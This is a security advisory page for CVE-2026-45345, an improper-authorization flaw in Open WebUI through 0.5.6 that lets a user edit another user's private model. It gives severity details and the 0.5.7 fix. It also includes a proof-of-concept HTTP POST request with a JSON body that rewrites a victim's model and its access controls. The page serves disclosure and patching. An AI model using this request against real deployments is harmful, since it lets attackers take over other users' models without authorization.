AI Threat Alert

CVE-2026-45345

GHSA-gm54-m39w-grjp MEDIUM
Published May 14, 2026

### Summary A user can modify another user's model even if its visibility is set to `Private`. The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue...

Full CISO analysis pending enrichment.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
open-webui pip <= 0.5.6 0.5.7
136.3K Pushed 5d ago 75% patched ~4d to patch Full package profile →

Do you use open-webui? You're affected.

Severity & Risk

CVSS 3.1
6.5 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
N/A

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C None
I High
A None

What should I do?

Patch available

Update open-webui to version 0.5.7

Compliance Impact

Compliance analysis pending. Sign in for full compliance mapping when available.

Frequently Asked Questions

What is CVE-2026-45345?

Open WebUI missing authorization check at the model update function - models from other users can be updated

Is CVE-2026-45345 actively exploited?

No confirmed active exploitation of CVE-2026-45345 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-45345?

Update to patched version: open-webui 0.5.7.

What is the CVSS score for CVE-2026-45345?

CVE-2026-45345 has a CVSS v3.1 base score of 6.5 (MEDIUM).

Technical Details

NVD Description

### Summary A user can modify another user's model even if its visibility is set to `Private`. The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4. ### Details / PoC The user `Victim` created a private model with the visibility set to `private`: ![grafik](https://github.com/user-attachments/assets/de057943-512b-46bf-8671-2904d55ec056) The user `Attacker` can edit this model using the following POST request: ``` POST /api/v1/models/model/update?id=aaabraaa HTTP/2 Host: domain.local //Some headers removed Te: trailers {"id":"aaabraaa","base_model_id":"gpt-4o-POC","name":"testmodel","meta":{"profile_image_url":"/static/favicon.png","description":"","capabilities":{"vision":true,"usage":false,"citations":true},"suggestion_prompts":null,"tags":[],"toolIds":["test"]},"params":{},"user_id":"565c82e6-083f-42bb-bf0f-a4e214cfb9ad","access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}},"is_active":true,"updated_at":1737314575,"created_at":1737121281} ``` Request / Response ![grafik](https://github.com/user-attachments/assets/19986403-b782-4288-b618-202b55519bb1) ### Impact A user can modify another user's model even if its visibility is set to `Private`. By changing the access permissions during editing, unauthorized access can be gained.

Weaknesses (CWE)

CWE-285 Improper Authorization Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

References

Timeline

Published
May 14, 2026
Last Modified
May 14, 2026
First Seen
May 15, 2026

Related Vulnerabilities

CRITICAL CVE-2026-44551 9.1

open-webui: LDAP auth bypass — full account takeover

Same package: open-webui
HIGH CVE-2026-45672 8.8

open-webui: code exec gate bypass via API endpoint

Same package: open-webui
HIGH CVE-2026-44552 8.7

open-webui: Redis cache poisoning enables cross-instance tool hijack

Same package: open-webui
HIGH CVE-2025-64495 8.7

Open WebUI: XSS-to-RCE via malicious prompt injection

Same package: open-webui
HIGH CVE-2026-45315 8.7

Analysis pending

Same package: open-webui
Back to Threat Feed